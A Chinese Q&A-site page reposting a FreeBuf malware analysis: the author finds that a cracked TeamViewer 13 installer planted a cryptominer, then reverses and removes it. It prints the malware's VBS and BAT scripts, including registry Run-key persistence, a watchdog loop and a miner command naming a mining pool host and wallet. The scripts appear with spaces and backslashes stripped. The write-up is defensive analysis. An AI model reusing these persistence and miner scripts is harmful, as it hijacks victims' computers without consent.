当前位置:首页 > 问答百科 > 正文内容

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)

福瑞号2023-05-12 19:26:27问答百科93

不提供TeamViewer激活码分享,建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。



你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图1

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图2

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图3

直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图4

0.Servicecrsssr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat:

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat:

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了,看看到底挖了多少钱。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图5

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图6

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图7

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图8

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图9

0×4病毒清理

事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2:清除注册表

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图10

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载自FreeBuf.COM

扫描二维码推送至手机访问。

版权声明:本文由福瑞号发布,如需转载请注明出处。

本文链接:http://furui.com.cn/174981.html

“teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)” 的相关文章

蝴蝶的翅膀为什么有颜色(科普:无色结构组成的蝴蝶翅膀为什么能显现出那么多颜色)

蝴蝶的翅膀为什么有颜色(科普:无色结构组成的蝴蝶翅膀为什么能显现出那么多颜色)

蝴蝶的翅膀为什么特别美丽? 蝴蝶是一种最常见的昆虫, 翅膀挺大, 色彩艳丽, 每当风和日暖的时候, 大多喜欢在花丛中翩翩飞舞,活像一朵 '能飞的花'。可是·如果你用手去捉蝴蝶, 只要手指一碰它的翅膀, 手指上就会粘上一层“粉末'状的东西; 而蝴蝶的翅膀经手碰过的地方, 就失去了美丽的色彩, 变成透明...

甄嬛的孩子是谁的(甄嬛的孩子到底是谁的)

甄嬛的孩子是谁的(甄嬛的孩子到底是谁的)

甄嬛的孩子并非都跟皇帝所生。甄嬛一生怀过五个孩子,但真正活下来的只有女儿胧月公主,灵犀公主和儿子弘瞻阿哥。另有一个后来做了皇帝的弘历并非甄嬛亲生,而是雍正为了接回当时在宫外修行的甄嬛,过继给甄嬛膝下的。 甄嬛的第一个孩子,是与皇上的孩子,但是遭人陷害,孩子未能活着出生。甄嬛的第二个孩子,也是与皇...

莫言哪里人(莫言)

莫言哪里人(莫言)

文:一方一言 莫言这位作家从某种程度上来说,可谓是为国争光了,因为在2012年时他获得了诺贝尔文学奖,这是我国第一个获得该奖的作家,这足以证明他的文学实力。 但是有这样一个有趣的现象,在教材上从来没有选录过莫言的作品,这是为什么呢?按理说,像这种出名的作家,他的艺术作品一般会被选择到书本上,让学生们...

等离子和液晶的区别是什么(等离子电视机和液晶电视机的区别是什么)

等离子和液晶的区别是什么(等离子电视机和液晶电视机的区别是什么)

电视机作为现代家庭必不可少的生活家电之一,也衍生出了各种类型的型号。等离子电视机(PDP)和液晶电视机(LCD)作为平板电视的不同类型,其优劣一直没有最终的定论。虽然这两种电视机表面看起来非常相似,但本质上却有不小的差别。为了帮助大家有个更直观的认识,今天这篇文章我们就来详细讲解一下等离子电视机和液...

魔兽埃其亚基在哪(魔兽怀旧服:埃其亚基这只白狮子到底在哪)

魔兽埃其亚基在哪(魔兽怀旧服:埃其亚基这只白狮子到底在哪)

魔兽怀旧服中,埃其亚基是一只外形为白色的草原狮,比较独特,是很多猎人必抓的一只宠物。 埃其亚基 同时也是任务所需击杀的怪物。部落玩家在十字路口完成前置任务就会接到任务“埃其亚基”,任务要求跟任务名称一致,击杀一只名为埃其亚基的草原狮首领并捡取它的皮作为证明。 任务指示它的巢穴就在十字路口的东北...